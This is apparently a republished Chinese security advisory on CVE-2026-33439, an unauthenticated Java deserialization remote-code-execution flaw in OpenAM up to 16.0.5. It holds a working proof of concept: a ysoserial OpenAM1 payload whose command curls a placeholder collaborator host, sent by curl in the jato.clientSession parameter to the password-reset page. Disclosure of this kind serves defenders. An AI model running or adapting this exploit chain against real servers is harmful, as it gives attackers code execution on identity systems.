CVE-2026-33439｜OpenAM反序列化远程代码执行（POC）

0x00 前言

OpenIdentityPlatform OpenAM是一款基于Java开发的开源访问管理解决方案，以模块化可插拔架构为核心，提供认证、单点登录（SSO）、授权、联合身份认证等全链路身份安全能力。它支持密码、一次性密码（OTP）等多种认证方式，兼容SAML、OAuth2、Kerberos等主流协议，可通过集成OpenIG或策略代理实现灵活的访问控制策略，实现跨域单点登录；

作为企业级身份管理工具，它能无缝对接LDAP、Active Directory等身份数据源，广泛应用于企业内部系统统一管控、B2B集成认证、云服务与移动应用安全接入等场景，遵循CDDL许可证，提供社区与商业双重支持选项，帮助组织构建安全高效的数字身份管理体系。

0x01 漏洞描述

漏洞源于组件在使用JATO框架处理jato.clientSession HTTP参数时，直接对用户输入的字节流进行了Java反序列化处理，且未应用此前针对jato.pageSession参数设置的白名单（WhitelistObjectInputStream）防护措施。

未经身份验证的远程攻击者通过向包含<jato:form>标签的JSP页面（如密码重置页面）发送构造的恶意序列化对象，即可在服务器上实现任意代码执行。

0x02 CVE编号

CVE-2026-33439

0x03 影响版本

OpenAM<=16.0.5

0x04 漏洞详情

POC：

java --add-opens java.base/java.util=ALL-UNNAMED \
     --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
     -jar ysoserial-all.jar OpenAM1 \
     "curl http://YOUR-COLLABORATOR-ID.oastify.com" > payload.bin

PAYLOAD=$(base64 < payload.bin | tr -d '\n' | tr '+/' '-_' | tr -d '=')

curl -k "https://TARGET/openam/ui/PWResetUserValidation?jato.clientSession=${PAYLOAD}"

0x05 参考链接

https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

https://github.com/OpenIdentityPlatform/OpenAM/releases

Ps：国内外安全热点分享，欢迎大家分享、转载，请保证文章的完整性。文章中出现敏感信息和侵权内容，请联系作者删除信息。信息安全任重道远，感谢您的支持！！！